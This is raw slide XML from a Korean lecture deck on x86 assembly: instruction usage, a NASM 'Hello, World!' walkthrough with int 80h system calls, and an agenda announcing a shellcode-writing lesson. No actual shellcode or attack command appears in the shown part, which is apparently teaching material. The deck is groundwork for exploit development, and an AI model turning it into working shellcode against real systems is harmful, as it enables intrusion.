              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2424361275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5EA1AE-5BDB-44C9-9490-AA2BB497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어셈블리 기본 명령어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43F112-9C86-4BF8-9B0C-8BE0945E1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97" y="1754660"/>
            <a:ext cx="7723526" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, and,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>or,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>add,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, div</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>(or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>else..) [destination] [source]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>각각의 연산을 수행한 후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>연산된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 값을 넣습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.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dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> [number]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>해당 번호의 인터럽트를 줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>아무 동작도 하지 않는 명령어입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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1849901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5EA1AE-5BDB-44C9-9490-AA2BB497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어셈블리 기본 명령어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43F112-9C86-4BF8-9B0C-8BE0945E1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97" y="1754660"/>
            <a:ext cx="7723526" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> [source]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 피연산자로 실행 흐름을 변경합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.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dirty="0"/>
              <a:t>8. call</a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: call [source]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 동작과 똑같지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>추가로 리턴 주소를 스택에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.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dirty="0"/>
              <a:t>9. ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>저장해놓은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 리턴 주소를 사용해 원래의 흐름으로 돌아갑니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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0759074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A218ED6-B77D-4683-A32E-99208420AC6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266093" y="2927832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trike="sngStrike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지루한 이론시간이 끝났으니</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" strike="sngStrike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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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이제 본격적으로 어셈블리 코딩을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1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해볼까요오옷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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4A194F-D503-46C8-9B34-22B9320A7E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310053" y="3451037"/>
            <a:ext cx="6242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Let’s coding with Assembly!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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DE47B2-7256-4448-B442-49EDF5F19EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398476" y="6550223"/>
            <a:ext cx="3991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사실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직접 해보면서 배우는게 제일 빠르던데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..)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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17934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969F8-408C-4783-B29E-7F55EE04D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개발 환경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1CE0CC5-608D-47A6-9B6D-06DACF1D8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97" y="1767254"/>
            <a:ext cx="6858000" cy="4800645"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>OS		Ubuntu Linux 16.04 LTS x64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>Assembler	NASM Assembler v2.11.08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>Linker		GNU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> v2.26.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3748536940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Hello, World!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5103428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Hello, World!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A2C3A15-7BD0-484A-9BA3-7AE9963FB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637" y="1730482"/>
            <a:ext cx="3124200" cy="2409825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390E269F-D2D8-4575-B709-2257CF389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984" y="4525107"/>
            <a:ext cx="6921506" cy="97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35355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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>영역에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>이라는 상수에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, “Hello World!\n”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415562" y="1969477"/>
            <a:ext cx="2874113" cy="263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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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289675" y="2092570"/>
            <a:ext cx="466963" cy="87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41883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-KR" altLang="en-US" dirty="0"/>
              <a:t>순서</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="202" name="Shape 202"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1482251" y="4992908"/>
            <a:ext cx="0" cy="11592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oval" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1482251" y="1607182"/>
            <a:ext cx="0" cy="11592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oval" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215650" y="3612950"/>
            <a:ext cx="3569688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How can we make Shell Codes?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F3F3F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2215651" y="5305825"/>
            <a:ext cx="2998187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1800" dirty="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Let’s make shell code!</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F3F3F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2215650" y="1920075"/>
            <a:ext cx="23102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What is Shell Code?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F3F3F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207" name="Shape 207"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1482251" y="3300045"/>
            <a:ext cx="0" cy="11592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oval" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="875705753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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>helloworldlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>이라는 상수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>자신의 주소를 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 길이를 저장하게 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415562" y="2189286"/>
            <a:ext cx="2874113" cy="193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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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289675" y="2286001"/>
            <a:ext cx="387832" cy="8264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336045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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>영역에서는 일종의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>함수같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>_start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 선언해줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415562" y="2461845"/>
            <a:ext cx="2874113" cy="527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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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>
            <a:off x="4289675" y="2725615"/>
            <a:ext cx="387832" cy="14367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343994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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>_start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>안에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>번 인터럽트를 호출하면서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>eax~edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 통해 인자를 전달합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415562" y="2963009"/>
            <a:ext cx="2874113" cy="12036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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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289675" y="3564847"/>
            <a:ext cx="387832" cy="1596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159648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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>띠용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>…? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> 80h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>는 무엇을 하길래 두번이나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>쓰인걸까요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>..?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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934309" y="3429000"/>
            <a:ext cx="536330" cy="1758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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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470639" y="3516923"/>
            <a:ext cx="2206868" cy="879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044368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Hello, World!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E4BBB3-CD1A-459D-85E1-C078BC93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7507" y="1756858"/>
            <a:ext cx="3345989" cy="4811041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>바로 시스템 콜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>(System Call) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>호출입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>!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A2C3A15-7BD0-484A-9BA3-7AE9963FB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75" y="1756859"/>
            <a:ext cx="3124200" cy="24098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1E3109D-8574-427B-BDDE-F8C83AB68221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934309" y="3429000"/>
            <a:ext cx="536330" cy="1758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1EBEAF3-E1C2-4780-AE3A-A2A49DD47BDC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470639" y="3516923"/>
            <a:ext cx="2206868" cy="879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595307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System Call?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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F51062A6-3519-4A37-962F-8C6DCE21A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97" y="1754660"/>
            <a:ext cx="7028934" cy="2096627"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>운영체제는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>커널모드와</a:t>
            </a:r>
            <a:r>
